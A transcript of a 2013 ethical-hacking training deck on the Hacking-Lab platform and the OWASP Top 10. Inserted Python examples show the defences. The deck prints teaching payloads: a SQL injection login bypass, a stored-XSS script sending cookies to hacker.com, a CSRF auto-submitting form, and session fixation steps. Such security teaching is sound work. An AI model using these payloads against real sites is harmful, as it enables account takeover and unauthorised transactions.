Labs at Digicomp, Penetration Testing and Web Hacking Challenges by Ivan Bütler

Transcript

  • 1. Ethical Hacking
    Digicomp Hacking Day 2013
    by Ivan Bütler, CEO Compass Security AG, alias E1, ivan.buetler@csnc.ch
    Compass Security AG, Werkstrasse 20, Postfach 2038, CH-8645 Jona
    Tel +41 55 214 41 60, Fax +41 55 214 41 61, team@csnc.ch, www.csnc.ch
  • 2. We are "hackers"
    © Compass Security AG, Slide 2, www.csnc.ch
  • 3. Rapperswil – Berlin – Bern
  • 4. What do we do all day?
  • 5. Why are you here today?
    What does the future hold? Are you a nerd? Are illegal things appealing? Do you want to be mentally challenged? Do you want to make the world a little better? Are you planning a career with the Cyber Mafia? Are you planning a career as a Swiss cyber specialist? Because of the good food?
  • 6. Overview "Security Testing"
    Drivers for security tests: company, supplier, compliance, budget, sign-off, awareness, information security management, results / threats
  • 7. Overview "Security Testing": Methods
    manual vs. automated; one-off vs. regular; black box vs. white box; with and without login; hands-on vs. review; with or without social engineering; with or without source code; from outside or from inside?
  • 8. Overview "Security Testing": Simulation of attackers, intensity of the penetration test
  • 9. What does a good tester need?
  • 10. What is a good security tester?
    A tinkerer: How does something work? Why does it work? Taking things apart, putting them back together. A moped tuner!
  • 11. IT TAKES PRACTICE and TIME
  • 12. Hacking-Lab Online Security Lab
  • 13. Hacking-Lab Architecture
  • 14. Working with Hacking-Lab: Challenge Details, Hands-On, Send Solution, Solution Grading
  • 15. Hacking-Lab Roles
    Student: 1. Choose the challenge(s) 2. Solve the challenge 3. Answer the questions (submit) 4. Wait
    Teacher: 1. Responsible for challenges 2. Receiving your submissions 3. Solution grading: a) FULLY ACCEPT b) PARTIALLY ACCEPT c) REJECT
  • 16. Hacking-Lab Challenges & Categories
    Web Security, Malware / Trojan / Bugs, Windows Security, Apple Security, VoIP / SS7 / GSM, Wireless Security, Unix / Linux Security, Crypto Challenges, Penetration Testing, Networking, Forensics, Reverse Engineering, Programming, Fun Challenge
  • 17. Challenges – SBS versus WG
    Every challenge in Hacking-Lab is available as SBS or WG.
    SBS (Step by Step): SBS challenges are used in commercial trainings. Trainees do not have the time to spend 1-2 hours per challenge; they are guided through the challenge.
    WG (Wargame): WG challenges are used in free trainings, CTF and talent quest. Solving a WG challenge is more difficult and needs more knowledge.
  • 18. Challenges – SBS versus WG
    WG challenges (WG = Wargame): the mission of the challenge is given, but without further details. For the more advanced users. Level 1 = 10 points, Level 2 = 20 points, Level 3 = 30 points.
    SBS challenges (SBS = Step by Step): the mission of the challenge is given, including a step-by-step instruction. For beginners. Level 1 = 5 points, Level 2 = 10 points, Level 3 = 15 points (50% of WG).
  • 19. Examples (Screenshots)
  • 20. Running Events (Classrooms)
  • 21. to 27. Screenshot slides (no text)
  • 28. Ranking Page
  • 29. Avatar System
  • 30. Working from Remote? Using the HL LiveCD; VPN is required
  • 31. LiveCD Project (OpenVPN)
    Components: LiveCD SVN repository, ESX for LiveCD development, LiveCD Vx.y / Vx.z, delivered as VirtualBox OVA and VMware OVA
  • 32. Hacking-Lab LiveCD Project
  • 33. Hacking-Lab LiveCD Project: Browser – 1) Two profiles 2) Attacker 3) Victim 4) SwitchProxy 5) LiveHttpHeader 6) ... more
  • 34. Hacking-Lab LiveCD Project: ZAP Inspection Proxy – 1) Web analysis 2) Man in the middle 3) Open source 4) Java based 5) Loading = slow
  • 35. Hacking-Lab LiveCD Project: HELP – 1) Local webserver 2) Help
  • 36. How to Access Microsoft VM (VDI): ROOT shell
  • 37. How to Access Microsoft VM (VDI): User shell
  • 38. Hacking-Lab LiveCD Project: VPN
  • 39. How to Access Microsoft VM (VDI): VMware View VDI
  • 40. How to Access Microsoft VM (VDI)
  • 41. How to Access Microsoft VM (VDI): User: hacker10, hacker11, hacker12 with password compass
  • 42. How to Access Microsoft VM (VDI): Choose VIEW pool (Hacking-Lab Clients)
  • 43. 5) How to Access Microsoft VM (VDI): Enjoy the XP machine (connected with PCoIP)
  • 44. https://www.hacking-lab.com/tutorial/
    LiveCD usage with VirtualBox appliance; LiveCD usage with VMware 8 Workstation; How to connect to HL with OpenVPN: https://www.hacking-lab.com/FAQ/
  • 45. Online qualification in April / May 2013; semi-final 13 June 2013, KKL Luzern; final in Linz / Wien, 5-7 November 2013
  • 46. How does the Cyber Challenge work?
  • 47. (no text)
  • 48. Join in!!
    Swiss Cyber Storm registration: https://www.hacking-lab.com/sh/U8TA7c7
    Digicomp Hacking Day 2013 Web Security: http://bit.ly/10YcIMm
    Digicomp Hacking Day 2013 Penetration Testing: http://bit.ly/18LK7lg
  • 49. Attack Vectors
  • 50. What are the hackers doing? Direct attacks: BLOCKED, PASSED, BLOCKED (diagram)
  • 51. Indirect attacks: Man in the Middle – e.g. Phishing
  • 52. Indirect attacks: Malware – Mobile Devices – W-LAN (PASSED)
  • 53. Indirect attacks: Covert Channel
    Delivery via USB stick, start via auto-start (diagram: Internet, company network); the attacker "observes" the victim computer
  • 54. Network Penetration Testing
  • 55. Anatomy of a Hacker Attack
    Footprinting, Scanning, Think Time, Writing Exploits, Break-in, Privilege Escalation, Installation, Stealing Data, Backdoors, Delete evident tracks, DoS (Source: Anti-Hacker Book)
  • 56. Penetration Testing
    Information Gathering: Network Research, War Googling
    Scanning: Host and Service Discovery, Vulnerability Scanning
    Exploitation: Sniffing the Network, Exploiting Vulnerabilities (VLAN, VoIP, Conficker, DNS Updates)
    Backdoor Communication: Inside-Out, Covert-Channels
  • 57. Web Application Security: OWASP Top 10 (Digicomp Hacking Day 2013)
  • 58. OWASP TOP 10
  • 59. OWASP Top 10 (RC1 2010)
    A1 SQL Injection
    A2 Cross Site Scripting
    A3 Broken Auth & Session Management
    A4 Insecure Direct Object Reference
    A5 Cross Site Request Forgery
    A6 Security Misconfiguration
    A7 Failure to Restrict URL Access
    A8 Unvalidated Redirects and Forwards
    A9 Insecure Cryptographic Storage
    A10 Insufficient Transport Layer Protection
  • 60. SQL Injection
  • 61. A1: SQL Injection
    Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing.
  • 62. Introduction: Protocols – HTTPS, RMI, SQL (diagram)
  • 63. SQL Injection
    User input is directly used to build SQL statements: modification of the SQL query via the browser; a malicious hacker injects a SQL string.
    Application query: select creditcard from Customers where user is 'ibuetler'
    Malicious query: ... OR 1=1;
  • 64. SQL Injection: Protocols – HTTPS + SQL hacker code, RMI, SQL (diagram)
  • 65. Threat: Bypass Authentication – assembling strings into SQL queries
    public boolean auth(String user, String pass) {
        boolean isAuthenticated = false;
        // dynamic concatenation of the SQL string and the parameters
        String sqlQueryString = "SELECT Username " +
            "FROM Users WHERE Username = '" + user +
            "' AND Password = '" + pass + "'";
        int resultCount = perform(sqlQueryString);
        // checks whether at least one record exists; but the result must contain 0 or one result
        if (resultCount > 0) {
            return true;
        }
        return false;
    }
  • 66. Threat: Bypass Authentication
    Attacker uses the following input: Login: meier, Password: ' OR ''='
    Resulting query: SELECT Username FROM Users WHERE Username='meier' AND Password='' OR ''=''
    The WHERE clause evaluates to TRUE; all rows of the table get selected; the result set will not be empty!!! The user gets authenticated!
  • 67. Countermeasures A1: SQL Injection
  • 68. Secure Programming
    Java: use prepared statements. ADO.NET: use the Parameters collection. DB level: stored procedures (do not use dynamic SQL in SP!)
  • 69. Secure Programming (I) – Java Prepared Statements
    The SQL statement gets precompiled at the database; parameters are separate from the SQL statement; much faster when the SQL statement is used several times; safe against SQL injection attacks.
    PreparedStatement updateSales = dbCon.prepareStatement(
        "UPDATE COFFEES SET " + "SALES = ? WHERE COF_NAME LIKE ?");
    updateSales.setInt(1, 75);              // correct
    updateSales.setString(2, "Colombian");  // usage
    updateSales.executeUpdate();
  • 70. Insecure – Secure Programming (III)
    But be aware: this prepared statement is still vulnerable to SQL injection!
    // Prepares the statement on the database
    PreparedStatement updateSales = dbCon.prepareStatement(
        "UPDATE COFFEES SET SALES = ? WHERE COF_NAME "
        + "LIKE '" + name + "'");           // insecure usage: name is concatenated, not bound
    // Sets the parameters for the statement
    updateSales.setString(1, req.getParameter("sale"));
    // Executes the statement
    updateSales.executeUpdate();
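The bypass from slides 65/66 and the pitfall from slide 70, replayed against an in-memory SQLite table as an added example (not code from the deck). The Users rows are constructed sample data, and the slide's perform() helper is replaced by a direct sqlite3 query.

```python
import sqlite3


def make_db():
    """Constructed sample table; the row values are not from the deck."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?)",
                    [("meier", "secret1"), ("ibuetler", "secret2")])
    return con


def auth_concat(con, user, pw):
    """Slide 65 pattern: the query text is assembled from the raw parameters."""
    sql = ("SELECT Username FROM Users WHERE Username = '" + user +
           "' AND Password = '" + pw + "'")
    rows = con.execute(sql).fetchall()
    return len(rows) > 0          # "at least one record" is enough here


def auth_prepared(con, user, pw):
    """Slide 69 pattern: placeholders; the driver binds the values separately."""
    sql = "SELECT Username FROM Users WHERE Username = ? AND Password = ?"
    rows = con.execute(sql, (user, pw)).fetchall()
    return len(rows) == 1         # slide 65's note: a login must match exactly one row


def like_concat(con, name):
    """Slide 70 pitfall: a prepared statement whose LIKE operand is still concatenated."""
    sql = "SELECT Username FROM Users WHERE Username LIKE '" + name + "'"
    return sorted(r[0] for r in con.execute(sql).fetchall())


def like_prepared(con, name):
    """The same query with the LIKE operand bound as a parameter."""
    sql = "SELECT Username FROM Users WHERE Username LIKE ?"
    return sorted(r[0] for r in con.execute(sql, (name,)).fetchall())


# Slide 66 input: Login "meier", Password ' OR ''='
INJECTED_PASSWORD = "' OR ''='"

if __name__ == "__main__":
    con = make_db()
    print("concatenated query :", auth_concat(con, "meier", INJECTED_PASSWORD))
    print("prepared statement :", auth_prepared(con, "meier", INJECTED_PASSWORD))
    print("LIKE concatenated  :", like_concat(con, INJECTED_PASSWORD))
    print("LIKE bound         :", like_prepared(con, INJECTED_PASSWORD))
```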
  • 71. OWASP Top 10 (RC1 2010): overview list as on slide 59; next item: A2 Cross Site Scripting
  • 72. A2: Cross Site Scripting
    XSS is the most prevalent web application security flaw. XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.
  • 73. Attack Vector: Protocol
    JavaScript from www.abc.com is loaded to the client (malware). Attractive!! Authentication into the web application; session hijacking (re-use of the client session).
  • 74. JavaScript from Malware Site (1)
    E-Bank, Malware Site, cookie between E-Bank and browser. JavaScript from the malware site IS GENERALLY DENIED to access the E-Bank cookie because of the SAME ORIGIN POLICY.
  • 75. JavaScript from Malware Site (2)
    E-Bank, Malware Site, cookie between E-Bank and browser; <script src=http://Malware Site/m.js>. JavaScript from the malware site IS ALLOWED to access the E-Bank cookie if the script is loaded from the E-Bank site (origin) with <script src=>.
  • 76. Cross-Site Scripting (XSS)
  • 77. Session Stealing Sequence
    Malicious JavaScript performs its own request.
    Hacker -> Web application: POST /document.jsp?id=898&value=<script>location.href="http://hacker.com/"+document.cookie</script> (the web application stores the value in its DB)
    Client -> Web application: GET /app/document.jsp?id=898, Cookie: session=123
    Response: <script>location.href="http://hacker.com/"+document.cookie</script>
    Client -> Hacker: GET /session=123 (the hacker stores the request in a log file)
  • 78. Reflected XSS
    What is reflected XSS? Data provided by a web client is used immediately by server-side code to generate a page of results for that user. The attacker has to send a crafted link to the victim. Typical example: search form.
    Attacker -> Victim: sends link http://example.com/search?<script>...</script>
    Victim -> Webserver: GET /search?<script>...</script>
    Webserver -> Victim: search results for: <script>...</script>; the script is executed
  • 79. Stored XSS
    What is stored XSS? Data provided by a web client is stored in a database. This data is then presented to the user unencoded. The malicious script is rendered more than once. XSS worms are based on stored XSS vulnerabilities. Typical example: message board.
  • 80. Recommendations
  • 81. XSS Prevention – possible solutions
    Convert output into HTML entities: < &lt; > &gt; " &quot; ' &apos;
    Input validation on characters: do not accept "dangerous" characters (e.g. <); delete "dangerous" characters from the request; transform "dangerous" characters into HTML entities.
    Input validation on strings / tags: do not accept "dangerous" tags (e.g. <script>); delete "dangerous" tags from the request; transform "dangerous" tags into HTML entities.
  • 82. ESAPI
    OWASP Enterprise Security API (ESAPI), available for all major programming languages: Java, .NET (work in progress), PHP (work in progress), ColdFusion (work in progress), ...
    Methods to prevent XSS:
    Encoder.encodeForHTML(maliciousString);
    Encoder.encodeForHTMLAttribute(maliciousString);
    Encoder.encodeForJavascript(maliciousString);
    Encoder.encodeForVBScript(maliciousString);
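Context-specific output encoding in the spirit of the ESAPI encoder methods above, as an added example (my code, not ESAPI's): the stored value from slide 77 is rendered into HTML body, attribute and JavaScript-string contexts and comes out inert in each. Python's html.escape emits &#x27; for the apostrophe where slide 81 lists &apos;; both are valid entities.

```python
import html

# The stored-XSS value from slide 77, used here as the test input.
PAYLOAD = '<script>location.href="http://hacker.com/"+document.cookie</script>'


def encode_for_html(s):
    """HTML body context: the entity table of slide 81 (& is encoded as well)."""
    return html.escape(s, quote=True)


def encode_for_html_attribute(s):
    """Attribute context: same entities; the template must also quote the attribute."""
    return html.escape(s, quote=True)


def encode_for_javascript(s):
    """JS string-literal context: every character outside [A-Za-z0-9] becomes
    \\xHH or \\uHHHH, so the value can close neither the quote nor the element."""
    out = []
    for ch in s:
        code = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif code < 0x100:
            out.append("\\x%02X" % code)
        else:
            out.append("\\u%04X" % code)
    return "".join(out)


def render_document(value):
    """A document.jsp-like page (slide 77) that encodes the stored value per context."""
    return (
        "<p>" + encode_for_html(value) + "</p>\n"
        '<input type="text" value="' + encode_for_html_attribute(value) + '">\n'
        "<script>var v = '" + encode_for_javascript(value) + "';</script>"
    )


def render_document_unsafe(value):
    """The vulnerable original: the stored value is copied into the page unencoded."""
    return "<p>" + value + "</p>"
```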
  • 83. OWASP Top 10 (RC1 2010): overview list as on slide 59; next item: A3 Broken Auth & Session Management
  • 84. A3: Broken Authentication
    Developers frequently build custom authentication and session schemes, but building these correctly is hard. As a result, they frequently have flaws, usually in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.
  • 85. HTTP Authentication Mechanisms
  • 86. Strong Authentication SMS: 1) UN/PW 2) OTP
  • 87. Client Certificate Auth
  • 88. Authentication Strength
    Factors of authentication (3 variants): to KNOW something (password, PIN); to OWN something (smartcard, SecurID, Safeword, Vasco, OTP); to BE something (fingerprint, iris, voice, face).
    Definition of "strong authentication": combination of at least 2 factors.
  • 89. Authentication in Web Applications
    Browser authentication, based on response headers (HTTP protocol): BasicAuth, DigestAuth, NTLM Auth
    Form-based authentication (application login): POST: submit login credentials in the POST body; GET: submit login credentials in the URL
    SSL based authentication (HTTPS protocol): client certificate
    Authentication schemes: direct; challenge/response; second channel (SMS, tokens)
  • 90. Login Service Attacks
  • 91. User Enumeration
    Verbose login related error messages can lead to user enumeration: "Password incorrect", "User unknown". Login error messages must be neutral: "Username or Password incorrect". Critical dialogs: login, change password, lost password.
  • 92. Session Handling Attacks
  • 93. Session Fixation
    A special form of session hijacking: the hacker tricks the victim into using a session known to the hacker. In the example, URL based session tracking is used.
    Hacker -> WebApp: /index.html; WebApp -> Hacker: Session=123
    Hacker -> Victim: Please use session=123 for Webapp/index.html
    Victim -> WebApp: /index.html; Session=123; WebApp -> Victim: LoginForm
    Victim -> WebApp: doLogin(UserCredentials) + session=123; WebApp: Authenticate(); Auth=Successful!
    Victim -> WebApp: /protected/index.html + session=123
    Hacker -> WebApp: /protected/index.html + session=123
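A minimal server-side session store, added as an example (not the deck's code), that closes the slide 93 sequence: a fresh session ID is issued on every successful login, and an ID the server never issued is not adopted. It also uses the neutral error text of slide 91 and the Secure/HttpOnly cookie flags of slide 125; verify_credentials is assumed to be supplied by the caller, and SameSite=Lax is my addition.

```python
import secrets
from typing import Callable, Dict, Optional, Tuple

NEUTRAL_ERROR = "Username or Password incorrect"   # slide 91: one message for both cases


class Session:
    def __init__(self):
        self.user: Optional[str] = None            # None until a login succeeded


class SessionStore:
    """Server-side sessions keyed by an unpredictable, server-generated ID."""

    def __init__(self):
        self._sessions: Dict[str, Session] = {}

    def new_session(self) -> str:
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = Session()
        return sid

    def get(self, sid: str) -> Optional[Session]:
        return self._sessions.get(sid)

    def resolve(self, sid_from_request: Optional[str]) -> str:
        """IDs the server never issued are not adopted: an attacker-chosen
        'session=123' (slide 93) is simply replaced by a fresh one."""
        if sid_from_request is not None and sid_from_request in self._sessions:
            return sid_from_request
        return self.new_session()

    def login(self, sid: str, username: str, password: str,
              verify_credentials: Callable[[str, str], bool]) -> Tuple[str, Optional[str]]:
        """Returns (session_id, error). On success the pre-login ID is destroyed
        and a new one issued, so a fixed ID never becomes an authenticated one."""
        if not verify_credentials(username, password):
            return sid, NEUTRAL_ERROR              # same text for unknown user and wrong password
        self._sessions.pop(sid, None)
        new_sid = self.new_session()
        self._sessions[new_sid].user = username
        return new_sid, None

    @staticmethod
    def set_cookie_header(sid: str) -> str:
        """Slide 125 flags (Secure, HttpOnly); SameSite=Lax is my addition."""
        return "Set-Cookie: session=%s; Secure; HttpOnly; SameSite=Lax; Path=/" % sid


def replay_slide_93(store: SessionStore,
                    verify_credentials: Callable[[str, str], bool]) -> bool:
    """Replays the slide 93 sequence with a server-issued ID handed to the victim.
    Returns True only if the hacker's ID ends up authenticated (it should not)."""
    hacker_sid = store.new_session()               # hacker obtains a valid session
    victim_sid = store.resolve(hacker_sid)         # victim is tricked into using it
    victim_sid, err = store.login(victim_sid, "victim", "correct-pw", verify_credentials)
    if err is not None:
        return False
    hijacked = store.get(hacker_sid)
    return hijacked is not None and hijacked.user is not None
```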
  • 94. OWASP Top 10 (RC1 2010): overview list as on slide 59; next item: A4 Insecure Direct Object Reference
  • 95. A4: Insecure Direct Object References
    1. For direct references to restricted resources, the application needs to verify the user is authorized to access the exact resource they have requested.
    2. If the reference is an indirect reference, the mapping to the direct reference
  • 96. Security by Obscurity
    Insecure admin links: menu links as the only means of authorization; bypass with URL and parameter guessing possible.
    Only partially implemented authorization: function authorization only.
  • 97. Authorization "decentralized"
    Single functions must call the authorization checks (Request -> Function or Data -> Authorization Check).
    Threats: calls to the authorization module are easily forgotten; each function must be tested.
  • 98. Authorization "centralized"
    Authorization must be implemented as centrally as possible, as one module (Request -> Authorization Check -> Function or Data).
    Advantages: less risk that the implementation of authorization checks is forgotten; easier to test.
    Disadvantages: data authorization often difficult to achieve.
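One way to build the centralized check of slide 98 so that it also covers the data-level check of slide 95 (the part the slide calls difficult), as an added example that is not the deck's code. The route table, roles and document owners are constructed for the illustration; the two app paths are the ones named on slide 117.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional, Tuple


class Forbidden(Exception):
    pass


@dataclass
class Request:
    user: Optional[str]                     # None for anonymous callers
    role: str                               # "anonymous", "user" or "admin"
    path: str
    params: Dict[str, str] = field(default_factory=dict)


RANK = {"anonymous": 0, "user": 1, "admin": 2}

# Constructed data: direct object reference (document id) -> owner.
DOCUMENTS = {"898": "meier", "899": "ibuetler"}


def get_app_info(req: Request) -> str:
    return "app info for %s" % req.user


def admin_get_app_info(req: Request) -> str:
    return "admin app info"


def get_document(req: Request) -> str:
    return "document %s" % req.params["id"]


def document_owner(params: Dict[str, str]) -> Optional[str]:
    return DOCUMENTS.get(params.get("id", ""))


OwnerLookup = Optional[Callable[[Dict[str, str]], Optional[str]]]

# Central table: path -> (handler, minimum role, owner lookup for the referenced object).
ROUTES: Dict[str, Tuple[Callable[[Request], str], str, OwnerLookup]] = {
    "/app/getappInfo":       (get_app_info,       "user",  None),
    "/app/admin_getappInfo": (admin_get_app_info, "admin", None),
    "/app/document.jsp":     (get_document,       "user",  document_owner),
}


def dispatch(req: Request) -> str:
    """Single entry point: every request is authorized here before any handler runs,
    so no individual function can forget the check (the threat on slide 97)."""
    route = ROUTES.get(req.path)
    if route is None:
        raise Forbidden("unknown URL")               # fail closed: no unlisted pages
    handler, min_role, owner_of = route
    if RANK.get(req.role, 0) < RANK[min_role]:       # function-level authorization
        raise Forbidden("insufficient role for %s" % req.path)
    if owner_of is not None:                          # slide 95: check the exact resource
        owner = owner_of(req.params)
        if owner is None or (owner != req.user and req.role != "admin"):
            raise Forbidden("not authorized for this object")
    return handler(req)
```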
  • 99. OWASP Top 10 (RC1 2010): overview list as on slide 59; next item: A5 Cross Site Request Forgery
  • 100. A5: Cross Site Request Forgery
    The easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.
  • 101. Introduction
    Cross Site Request Forgery has many names: XSRF, Session Riding, One Click Attack. XSRF != XSS.
    XSS exploits the trust that a client has for the website/application. The client trusts the website: all the JavaScript code is necessary to run the web application.
    XSRF exploits the trust that a website has for the user. The website trusts the client: all requests made by the user are intended to be made.
  • 102. Cross Site Request Forgery: E-Bank, Malware Site, cookie between E-Bank and browser. JavaScript from the malware site IS NOT ALLOWED to access the E-Bank cookie.
  • 103. Cross Site Request Forgery: <img src=http://bank/do_trade> – <img src=> loads an image from the bank; this is allowed and performs the malicious transaction.
  • 104. XSRF with GET Method
    Actions can be triggered by GET requests (e.g. order some items): http://www.shop.com/controller?action=buy&productId=1&quantity=23
  • 105. XSRF with POST Method
    Actions can be triggered by POST requests (e.g. order some items):
    POST /controller
    Host: www.shop.com
    .....
    action=buy&productId=1&quantity=23
  • 106. Malicious Hacker "POST" Form – prepared website from the hacker
    <body>
    <form action="http://www.shop.com/controller" method="POST">
    <input type="hidden" name="action" value="buy"/>
    <input type="hidden" name="productId" value="1"/>
    <input type="hidden" name="quantity" value="23"/>
    </form>
    <script>document.forms[0].submit();</script>
    </body>
  • 107. Assumptions
    The attacker knows the target website: what do the requests look like? The victim has a valid session cookie. If session handling is done in the URL, the website is not vulnerable to this kind of attack.
  • 108. Remediation
    The form contains a hidden field with a random token. Executing the request sends the hidden-field token to the server. The server then checks whether the hidden-field token is valid; if not, the request is cancelled.
    Only allowing POST requests is no solution (hidden form, JavaScript: form.submit()).
    In other words: websites should embed a fresh nonce in every form and check for it on every request. Forged requests will have the cookie, but not the nonce.
  • 109. Order after Remediation
    Victim -> Webshop: Login; Webshop -> Victim: Cookie=123
    Victim -> Webshop: GET /order_form.htm; the Webshop generates a random token and embeds it in the form as a hidden field: order_form.htm: <input type="hidden" name="token" value="uiwe4qi4">
    Victim -> Webshop: GET /controller?action=buy&token=uiwe4qi4&... Cookie=123; the Webshop checks the token; Order successful
  • 110. Order after Remediation (diagram)
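The remediation of slides 108/109 as an added example (not the deck's code): a fresh nonce is issued per rendered form, bound to the session that received it, and required by the state-changing controller; the forged form from slide 106 carries the cookie but no valid token and is cancelled, as is a replay of a spent token. The session IDs and form fields are constructed for the illustration.

```python
import secrets
from typing import Dict, Optional, Set, Tuple


class CsrfTokens:
    """Fresh nonce per rendered form, remembered against the session it was given to."""

    def __init__(self):
        self._issued: Dict[str, Set[str]] = {}

    def issue(self, session_id: str) -> str:
        token = secrets.token_urlsafe(16)            # slide 109 shows "uiwe4qi4" here
        self._issued.setdefault(session_id, set()).add(token)
        return token

    def consume(self, session_id: str, token: str) -> bool:
        """True exactly once for a token this session was given; then it is spent."""
        issued = self._issued.get(session_id, set())
        match: Optional[str] = None
        for candidate in issued:
            if secrets.compare_digest(candidate, token):  # constant-time compare
                match = candidate
        if match is None:
            return False
        issued.discard(match)
        return True


def render_order_form(tokens: CsrfTokens, session_id: str) -> str:
    """order_form.htm from slide 109: the token is embedded as a hidden field."""
    return ('<form action="/controller" method="POST">\n'
            '<input type="hidden" name="token" value="%s">\n'
            '<input type="hidden" name="action" value="buy">\n'
            '<input type="text" name="productId"><input type="text" name="quantity">\n'
            '</form>' % tokens.issue(session_id))


def controller(tokens: CsrfTokens, cookie_session: str,
               form: Dict[str, str]) -> Tuple[int, str]:
    """State-changing endpoint: the session cookie alone is not enough."""
    if not tokens.consume(cookie_session, form.get("token", "")):
        return 403, "request cancelled: missing or invalid token"
    return 200, "order successful: %s x product %s" % (form["quantity"], form["productId"])


def extract_token(form_html: str) -> str:
    """What the victim's own browser does: submit the hidden field it was served."""
    marker = 'name="token" value="'
    start = form_html.index(marker) + len(marker)
    return form_html[start:form_html.index('"', start)]
```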
  • 111. OWASP Top 10 (RC1 2010): overview list as on slide 59; next item: A6 Security Misconfiguration
  • 112. A6: Security Misconfiguration
    Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and network administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.
  • 113. Examples of Misconfigurations
    Do you have a process for keeping current on the latest versions and patches to all the software in your environment? This includes the OS, web/app server, DBMS, applications, and any libraries.
    Is everything unnecessary disabled, removed, or not installed (e.g., ports, services, pages, accounts)?
    Are default account passwords changed or disabled?
    Are all other security settings configured properly?
    Are all servers protected by firewalls / filters ... etc.?
    A concerted, repeatable process is required to develop and maintain a proper security configuration.
  • 114. Examples of Glocken-Shop Misconfigurations
    XML injection -> /etc/passwd & /etc/shadow; directory browsing of glocken.hacking-lab.com/logs/; Tomcat service runs with "root" privileges
  • 115. OWASP Top 10 (RC1 2010): overview list as on slide 59; next item: A7 Failure to Restrict URL Access
  • 116. A7: Failure to Restrict URL Access
    Applications are not always protecting page requests properly. Sometimes, URL protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget. Detecting such flaws is easy. The hardest part is identifying which pages (URLs) exist to attack.
  • 117. Introduction: Failure to restrict URL access
    Privilege escalation from anonymous to registered user; privilege escalation from registered to admin user.
    Examples of URLs: http://example.com/app/getappInfo, http://example.com/app/admin_getappInfo
    Exploit: if an authenticated, non-admin user is allowed to access the "admin_getappInfo" page, this is a flaw, and may lead the attacker to more improperly protected admin pages.
  • 118. OWASP Top 10 (RC1 2010): overview list as on slide 59; next item: A8 Unvalidated Redirects and Forwards
  • 119. Unvalidated Redirects and Forwards
    Such redirects may attempt to install malware or trick victims into disclosing passwords or other sensitive information. Unsafe forwards may allow access control bypass.
  • 120. OWASP Top 10 (RC1 2010): overview list as on slide 59; next item: A9 Insecure Cryptographic Storage
  • 121. Insecure Cryptographic Storage
    The most common flaw in this area is simply not encrypting data that deserves encryption. When encryption is employed, unsafe key generation and storage, not rotating keys, and weak algorithm usage is common. Use of weak and unsalted hashes to protect passwords is also common. External attackers have difficulty detecting such flaws due to limited access.
  • 122. Hashed and Salted User Passwords
    Do not store passwords in plain text in the table!! Example: a table with user accounts & plaintext passwords poses a high security risk!
    mysql> select username, password from users;
    +----------+----------+
    | username | password |
    +----------+----------+
    | hacker10 | compass  |
    | hacker11 | compass  |
    ...
    If possible: one-way hashed and salted passwords using hash algorithms like SHA-1 (do not use MD5 anymore)
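Slide 122 asks for one-way hashed and salted passwords. As an added example (not the deck's code), this rewrites the constructed users table above with PBKDF2-HMAC-SHA256, a salted and iterated hash, which is my choice over the single SHA-1 pass the slide names; the iteration count is a tunable I set for the demo. The point the test checks is that two users with the same password end up with different stored values.

```python
import base64
import hashlib
import hmac
import secrets
from typing import List, Optional, Tuple

ITERATIONS = 200_000          # work factor; raise it as hardware allows
SALT_BYTES = 16


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Returns 'pbkdf2_sha256$iterations$salt$hash'; the record is self-describing
    so the parameters can be raised later without re-hashing everything at once."""
    if salt is None:
        salt = secrets.token_bytes(SALT_BYTES)     # fresh random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS, base64.b64encode(salt).decode(), base64.b64encode(dk).decode())


def verify_password(password: str, stored: str) -> bool:
    """Recomputes the hash with the stored salt and iterations; constant-time compare."""
    try:
        algo, iterations, salt_b64, dk_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(dk, expected)


# The plaintext rows from slide 122 (constructed), as they should not be stored.
PLAINTEXT_USERS = [("hacker10", "compass"), ("hacker11", "compass")]


def migrate_table(rows: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Replaces each plaintext password by its salted hash."""
    return [(user, hash_password(pw)) for user, pw in rows]
```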
  • 123. OWASP Top 10 (RC1 2010): overview list as on slide 59; next item: A10 Insufficient Transport Layer Protection
  • 124. Insufficient Transport Layer Protection
    Applications frequently do not properly protect network traffic. Usually, they use SSL/TLS during authentication, but not elsewhere, exposing all transmitted data as well as session IDs to interception. Applications sometimes use expired or improperly configured certificates as well. Detecting such flaws is easy. Just observe the site's network traffic.
  • 125. Mitigation
    Use SSL + TLS; Set-Cookie: A=B; secure; HttpOnly; Reverse Proxy; Entry Server; Secure Gateway